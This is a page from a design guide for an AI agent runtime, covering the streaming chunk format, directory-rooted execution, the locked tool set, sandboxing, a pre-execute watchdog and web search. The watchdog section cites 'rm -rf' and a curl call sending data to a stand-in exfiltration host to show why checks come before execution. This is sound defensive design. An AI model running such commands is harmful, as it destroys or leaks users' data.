Foundations
Bedrock — the assumptions the rest of the guide rests on. An
implementor MAY swap any of these, but each swap pulls a
cross-cutting change. Read index first for the
vocabulary.
Streaming substrate: AI SDK v6
The agent system's wire format is the AI SDK v6 UIMessageChunk
stream. Every assistant turn — whichever model, whichever provider,
whichever runtime path — emits the same chunk vocabulary
(text-{start,delta,end}, reasoning-{start,delta,end},
tool-input-{start,delta,available},
tool-output-{available,error}, file, source-url,
source-document, data-*, finish-step, finish).
Why this pin. The AI SDK chunk shape is the only piece of the system that crosses both the provider boundary and the host boundary. If the recorder, the resume layer, the renderer, and the canonical inspection format all agree on the chunk shape, every other layer moves independently. Pinning is cheaper than translating.
What the AI SDK provides this guide for free.
- Tool input streaming (
tool-input-deltaduring a generation). - Per-step usage capture (the
onStepFinishcallback the recorder taps for token rollups). - An abort-signal model (one
AbortSignalpassed through the call chain). - A reducer (
@ai-sdk/react'suseChat) that enforces well-formed chunk order on the consumer.
Two consequences worth naming up front.
text-deltaMUST be preceded bytext-startfor the same message id. A "join an in-flight stream at chunk N" feature MUST replay the chunk log from the start, not from N. See Session lifecycle / streaming.- Tool I/O on the wire is two events, not one. The model emits
tool-input-{start,delta,available}while it generates the call; the runtime emitstool-output-{available,error}when the tool returns. The session schema collapses both into one row pertool_call_id; the canonical format keeps them separate.
Native vs adapter path
A high-traffic implementor MAY skip the AI SDK call layer for cost and latency (one less round of serialization). The guide allows it as long as the resulting stream is still AI-SDK-chunk-shaped. Both paths run the same downstream code.
Implementor notes that live outside AI SDK's own documentation — the
token-usage cache normalization rule, where the SDK's tool-loop
helper fits, what the RFC adds on top of the substrate — are
collected in ai-sdk.
Outward wire vs internal stream
The AI SDK chunk shape is the internal stream — the language the
core, the recorder, the canonical inspection format, and the resume
layer all speak. When the host delivers the stream to an external
client (an editor, an IDE, another agent host), the outward wire
is ACP. A thin adapter translates AI-SDK-v6 chunks to
ACP session/update notifications without introducing buffering or
its own state. See ACP integration for the mapping.
Directory-rooted execution
An agent runs on top of a directory. That directory is one of:
- A workspace the user opened on their local machine.
- An ad-hoc file's containing directory (quick-open).
- A cloud sandbox provisioned for the run.
- A git worktree the user is on.
The agent's fs.* capability is bounded by that root (and any
additional roots the manifest declares — for example {user-data}
for config writes). It is never bounded by the host's whole
filesystem.
This is the smallest assumption the rest of the guide leans on:
- Skills discovery walks upward from the root looking for
.agents/skills/and equivalents. Seeskills. - System prompt includes the root, the platform, and the git status as ambient context.
- Sandbox sub-policies are expressed relative to the root.
- Subagent
taskcalls inherit the root unless explicitly overridden.
The root is resolved at session start and is immutable for the session's lifetime. A "move to a different directory" is a new session.
Locked fundamental tools
Every implementation MUST ship the locked tool set. The 13 ids are
read, write, edit, glob, grep, bash, todo, task,
question, web_search, web_fetch, skill, tool_search.
The set is non-opinionated: each tool is the smallest thing it
can be. Models trained on tool use have learned these names; the
lock guarantees portability. Per-tool shapes, capability
declarations, and the result envelope live in tools.
Sandbox placement
The sandbox is the host's responsibility, not the agent
system's. The runtime publishes a capability surface; the host
enforces it. See environments for the three
environments (web / cloud sandbox / computer) and their sandbox
primitives.
What the agent system guarantees in return: no free
process.spawn, no free fetch, no free fs.*. Every side
effect goes through a declared capability. The host enforces its
policy at one boundary instead of chasing every tool author.
Watchdog
A pre-execute hook on every tool call. The watchdog inspects the tool id, the validated arguments, the agent's manifest, and the session id, and returns:
allow— the call proceeds.deny(reason)— the call fails with a tool error. The model gets the reason on the next turn and can adjust.ask— only on a host with a human user; the host shows the command, the user picks once / always / reject. Headless hosts MUST treataskasdeny.
Why pre-execute and not post-tool-call. The damaging act of a
shell call (rm -rf, curl <data> exfil.example.com) is the call
itself. Post-call rejection is too late.
Reference policy for bash
The watchdog is intentionally generic; the guide does not name a "dangerous" command. A reasonable reference policy:
- Allow read-only commands by default (
ls,cat,grep,find,git status,git log, language-version checks). - Ask on writes outside the workspace root, network downloads, and privileged commands.
- Deny commands that touch destructive system paths regardless of who asked.
Policies are per-host. A CI host can be stricter (ask for everything not on an allowlist). A local-dev host can be looser (allow within the workspace, ask outside).
Watchdog vs permission rules vs sandbox
Three layers, defense in depth:
- Manifest / runtime capability. Refuses out-of-scope paths and hosts at the API boundary. No model output reaches the OS.
- Watchdog. Refuses categories of arguments the manifest cannot express ("no commands that look like exfiltration").
- Environment sandbox. Refuses things the runtime mis-let-through.
Each layer is sufficient for its kind of failure. Together they form the budget for the agent to do real work.
Web search
Web search is a fundamental tool that is not implementable in-house. The host wires it to a real provider; the agent sees one tool with one input and one output shape across providers.
web_search({ query: string, max_results?: int })
→ { results: { title, url, snippet }[] }
Provider seam: the provider is the host's choice and SHOULD be stable per session (hash the session id to pick) so a flaky provider fails consistently and inspection shows one row, not a random walk.
Cost and quota: per-session call cap (default ~25); per-call timeout (default 15s) that returns a tool error rather than hanging; deterministic provider pick per session.
Putting web search in the lock forces every host to wire one — the friction of bringing a key is paid once, not per agent.
Cross-cutting invariants
The following hold across every implementor:
- One universal LLM loop. Whichever agent runs, whichever model is picked, the loop is the same code. Agent specialization is config, not a fork of the loop.
- AI SDK v6 chunk shape internally. Both runtimes (native + AI SDK adapter) emit the same envelope. The chunk shape is the lingua franca inside the host.
- ACP is the recommended outward protocol. When the agent is consumed by an external client, the Agent Client Protocol wraps the internal stream. See ACP integration.
- Three-table session shape.
chat_sessions/chat_messages/chat_parts, JSON for part data. Implementors that pick a different DB engine port the three tables. See Persistency. - No free side effects. Every tool's
requiresis declared upfront; the runtime refuses out-of-scope calls. - Subagents share the loop. A subagent is a child session running the same code, gated by intersected permissions. See Subagents.
- Compaction is mandatory above a threshold. No implementor ships "the model just stops working at 100% context." See Compaction.
See also
- Session Lifecycle — what runs on top of the AI-SDK-v6 + SQLite bedrock.
- Tools — per-tool detail of the locked set.
- Environments — sandbox primitives by host environment.
- Persistency — the three-table schema.
- ACP integration — the outward wire.